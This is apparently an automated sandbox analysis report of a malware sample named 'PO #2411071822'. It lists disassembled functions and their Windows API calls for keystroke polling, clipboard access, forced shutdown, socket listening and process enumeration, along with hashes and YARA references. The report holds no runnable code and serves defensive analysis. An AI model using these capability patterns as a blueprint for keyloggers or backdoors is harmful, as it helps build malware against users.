                                                                                                              • Opcode Fuzzy Hash: 745a0bd3680d835b173d549e2c722ea1063a28b0217bc93411d141f2faeea9c6
                                                                                                              • Instruction Fuzzy Hash: D6E17A34604210AFDB15DF29C981E2BBBE8EF88714B04856EF44ADB2A1DB34ED01CB56
                                                                                                              Function 00422B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetKeyboardState.USER32(?), ref: 00422B5F
                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00422BE0
                                                                                                              • GetKeyState.USER32(000000A0), ref: 00422BFB
                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00422C15
                                                                                                              • GetKeyState.USER32(000000A1), ref: 00422C2A
                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00422C42
                                                                                                              • GetKeyState.USER32(00000011), ref: 00422C54
                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00422C6C
                                                                                                              • GetKeyState.USER32(00000012), ref: 00422C7E
                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00422C96
                                                                                                              • GetKeyState.USER32(0000005B), ref: 00422CA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: State$Async$Keyboard
                                                                                                              • String ID:
                                                                                                              • API String ID: 541375521-0
                                                                                                              • Opcode ID: 2e6acb485684df71c2645126fdb47084012df78f85e66e822992f0c1ea7ab11c
                                                                                                              • Instruction ID: bed61ae0329378a623ae8412b6bba2fb60e207f5bf21c672e106db7b53abe543
                                                                                                              • Opcode Fuzzy Hash: 2e6acb485684df71c2645126fdb47084012df78f85e66e822992f0c1ea7ab11c
                                                                                                              • Instruction Fuzzy Hash: E441C730B047E979FF319B61AA043BBBEA06B11314F84405BD5C6567C1EBEC99C4C76A
                                                                                                              Function 00436D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1737998785-0
                                                                                                              • Opcode ID: 084bfe2322d6ef714551b0280e4a9969536f37109ac3093bb33cb02ada3596cb
                                                                                                              • Instruction ID: a6d6197428b71aefc290a79a86d7413bb42a6fc491b0c155c0bb5f36d3f48c67
                                                                                                              • Opcode Fuzzy Hash: 084bfe2322d6ef714551b0280e4a9969536f37109ac3093bb33cb02ada3596cb
                                                                                                              • Instruction Fuzzy Hash: 3121C731B00111AFD711AF55DC49B6E77A8FF08710F05C02AF906DB2A1DB78ED018B5A
                                                                                                              Function 0043C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00419ABF: CLSIDFromProgID.OLE32 ref: 00419ADC
                                                                                                                • Part of subcall function 00419ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00419AF7
                                                                                                                • Part of subcall function 00419ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00419B05
                                                                                                                • Part of subcall function 00419ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00419B15
                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0043C235
                                                                                                              • _memset.LIBCMT ref: 0043C242
                                                                                                              • _memset.LIBCMT ref: 0043C360
                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0043C38C
                                                                                                              • CoTaskMemFree.OLE32(?), ref: 0043C397
                                                                                                              Strings
                                                                                                              • NULL Pointer assignment, xrefs: 0043C3E5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                              • String ID: NULL Pointer assignment
                                                                                                              • API String ID: 1300414916-2785691316
                                                                                                              • Opcode ID: 741278224161a51cb403e415d4e99d6934fd13f932bfba72b4bdf5c3d45e6b2e
                                                                                                              • Instruction ID: 37a497f90fca3d96b49643300aebad9b6ec55d63e24fc66f72ac4af4de12ff48
                                                                                                              • Opcode Fuzzy Hash: 741278224161a51cb403e415d4e99d6934fd13f932bfba72b4bdf5c3d45e6b2e
                                                                                                              • Instruction Fuzzy Hash: AD915E71D00228ABDB11DF95DC85EDEBBB8EF08310F10812AF915BB291DB746A45CFA4
                                                                                                              Function 004279D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041B180
                                                                                                                • Part of subcall function 0041B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041B1AD
                                                                                                                • Part of subcall function 0041B134: GetLastError.KERNEL32 ref: 0041B1BA
                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00427A0F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                                              • API String ID: 2234035333-194228
                                                                                                              • Opcode ID: 97431d98f67947605fb7b340bcf81cd59b358cdef689d39f216a9f5fec1ce9ef
                                                                                                              • Instruction ID: 0e156801323d640ca365a8f7d2df419f28826efa7199b068faeeb08794e7142b
                                                                                                              • Opcode Fuzzy Hash: 97431d98f67947605fb7b340bcf81cd59b358cdef689d39f216a9f5fec1ce9ef
                                                                                                              • Instruction Fuzzy Hash: FA014C71B983316BF7281664BC5BBBF72589B00364F500427F903A21C2E5AC5E0081AD
                                                                                                              Function 00438C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00438CA8
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00438CB7
                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00438CD3
                                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00438CE2
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00438CFC
                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00438D10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279440585-0
                                                                                                              • Opcode ID: bfbd1af7eae9e51e5c2f21a9954f5c2cef5cedbd5759df0d5d6d86ae3d9a6f6a
                                                                                                              • Instruction ID: f3aa24555245b3647b7dfdd456c7f2e93646f2f792cbcd0ad33066a6782e17bc
                                                                                                              • Opcode Fuzzy Hash: bfbd1af7eae9e51e5c2f21a9954f5c2cef5cedbd5759df0d5d6d86ae3d9a6f6a
                                                                                                              • Instruction Fuzzy Hash: D621E431B002109FCB10EF24D985B6EB7A9EF48714F10515EF917AB3D2CB74AD018B66
                                                                                                              Function 00426532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00426554
                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00426564
                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00426583
                                                                                                              • __wsplitpath.LIBCMT ref: 004265A7
                                                                                                              • _wcscat.LIBCMT ref: 004265BA
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004265F9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                              • String ID:
                                                                                                              • API String ID: 1605983538-0
                                                                                                              • Opcode ID: 194006175423643a5b23b4d01fabd96cb34e4f30909b198034d3d87a7a41f40e
                                                                                                              • Instruction ID: 4b807cd650224d92a3738f9e02603292a66b7aaabd065acc971d0ba361f2ffd0
                                                                                                              • Opcode Fuzzy Hash: 194006175423643a5b23b4d01fabd96cb34e4f30909b198034d3d87a7a41f40e
                                                                                                              • Instruction Fuzzy Hash: F1219B71E00218BBDB10AB55EC84BDE77BCAB05300F5000BAE505E3141EBB99FC5CB55
                                                                                                              Function 003E9B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$H
                                                                                                              • API String ID: 0-3889504827
                                                                                                              • Opcode ID: 3a3fb8765e3a89045cf874d99a94f32081c2b2b4d9b7efdf150032c871bc08f9
                                                                                                              • Instruction ID: e8c642f7464b090979e7c13268ab7072f24b2a3c4e5c06eb553d19263d356a23
                                                                                                              • Opcode Fuzzy Hash: 3a3fb8765e3a89045cf874d99a94f32081c2b2b4d9b7efdf150032c871bc08f9
                                                                                                              • Instruction Fuzzy Hash: 63929E71E00269CBDF25CF59C8807BEB7B1BB54314F15829AD856EB380E734AD81CB96
                                                                                                              Function 004213CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004213DC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen
                                                                                                              • String ID: ($,2I$<2I$|
                                                                                                              • API String ID: 1659193697-370024890
                                                                                                              • Opcode ID: 719e032c1ba0738f815ade79cbeb20298ee8f92b1cf2d38146c3f09b4b95194c
                                                                                                              • Instruction ID: 86bccaa113581068ce2de214b06d6e51427258b4957bc71504a58bd11f2077a6
                                                                                                              • Opcode Fuzzy Hash: 719e032c1ba0738f815ade79cbeb20298ee8f92b1cf2d38146c3f09b4b95194c
                                                                                                              • Instruction Fuzzy Hash: 36325674A007159FCB28DF29D480A6AB7F0FF58320B51C46EE49ADB3A1E774E981CB44
                                                                                                              Function 0043923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0043A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0043A84E
                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00439296
                                                                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 004392B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastinet_addrsocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 4170576061-0
                                                                                                              • Opcode ID: 5a1fb294336ca4650524a4de36227eaaeb0d3c4a8cc25eb43f24d972800c865d
                                                                                                              • Instruction ID: 0e162a2545a387123d55e4c337cf9ecaba26e737957d7d97ad14b75d596b31e1
                                                                                                              • Opcode Fuzzy Hash: 5a1fb294336ca4650524a4de36227eaaeb0d3c4a8cc25eb43f24d972800c865d
                                                                                                              • Instruction Fuzzy Hash: 88410370A00114AFDB15AB28C882E7F77EDEF48324F00455DFA56AB3D2DBB49D018B95
                                                                                                              Function 0042EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0042EB8A
                                                                                                              • _wcscmp.LIBCMT ref: 0042EBBA
                                                                                                              • _wcscmp.LIBCMT ref: 0042EBCF
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0042EBE0
                                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0042EC0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 2387731787-0
                                                                                                              • Opcode ID: 42148057f164acd07146053813a56bc7320fcefba6af5a0ad8294e7b514a3a80
                                                                                                              • Instruction ID: 5107c082094df29b6708fe58d562b2601cf0910b0452adb65906528d3ba11290
                                                                                                              • Opcode Fuzzy Hash: 42148057f164acd07146053813a56bc7320fcefba6af5a0ad8294e7b514a3a80
                                                                                                              • Instruction Fuzzy Hash: 3A41CF35700201DFC708DF6AD490AAAB7E4FF49324F10456EEA5A8B3A1DB75A940CB55
                                                                                                              Function 00448111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                              • String ID:
                                                                                                              • API String ID: 292994002-0
                                                                                                              • Opcode ID: 19a4c3dcd67dca1b6d7cc00a7cd8326eb8ce1dd75d1b44338331306210432785
                                                                                                              • Instruction ID: a7da91986ffc304bd8507b2b8baa355246684f411d11de558626cb4860dedb35
                                                                                                              • Opcode Fuzzy Hash: 19a4c3dcd67dca1b6d7cc00a7cd8326eb8ce1dd75d1b44338331306210432785
                                                                                                              • Instruction Fuzzy Hash: 03119031B005146BF7216F26DC44E6F779CEF44760B05042FF849D7281DF78990386AA
                                                                                                              Function 003FE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,003FE014,75920AE0,003FDEF1,0047DC38,?,?), ref: 003FE02C
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003FE03E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                              • API String ID: 2574300362-192647395
                                                                                                              • Opcode ID: 5754cad3a8c5ff9cf6a5a40de43ad8c963e29337f1837582f090d947b53e45bf
                                                                                                              • Instruction ID: b28d9dcded3ba7db679970329a4ed4ca79ff14de97c542d0b555c0e9ec327ac3
                                                                                                              • Opcode Fuzzy Hash: 5754cad3a8c5ff9cf6a5a40de43ad8c963e29337f1837582f090d947b53e45bf
                                                                                                              • Instruction Fuzzy Hash: 02D0A731D01713EFCF324F62ED48B627AD4AB01300F29443AE481D2164EBF8C8808654
                                                                                                              Function 003F3B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                                                              • String ID: @$ J$ J$ J
                                                                                                              • API String ID: 3728558374-336602664
                                                                                                              • Opcode ID: 2c54d644c0ff93cee41b688c639b920563302aa696b6203be6dc8961cdd0461a
                                                                                                              • Instruction ID: 0ec3f81c333879bd76e411aee99d1258cf809dcef17b34f0978bd709e49d7dae
                                                                                                              • Opcode Fuzzy Hash: 2c54d644c0ff93cee41b688c639b920563302aa696b6203be6dc8961cdd0461a
                                                                                                              • Instruction Fuzzy Hash: 1D72AE71E04209AFCB16DF94C481ABEB7B5EF48300F15806AEE05AB392D735AE45CB95
                                                                                                              Function 003FB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 003FB22F
                                                                                                                • Part of subcall function 003FB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 003FB5A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Proc$LongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2749884682-0
                                                                                                              • Opcode ID: 126a75332410736d99d8ac85b07799a22e865efc0d88b61ad797d810f5fca37f
                                                                                                              • Instruction ID: 818056962c11c84c170ebe8e9d126c96c55e028fc39d0353096fcfa4824d153f
                                                                                                              • Opcode Fuzzy Hash: 126a75332410736d99d8ac85b07799a22e865efc0d88b61ad797d810f5fca37f
                                                                                                              • Instruction Fuzzy Hash: A2A17AE010400CFAE72E6F2BCC88D7FA95CEB42345F14452FFA01D6A93DB199D05927A
                                                                                                              Function 00434EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004343BF,00000000), ref: 00434FA6
                                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00434FD2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
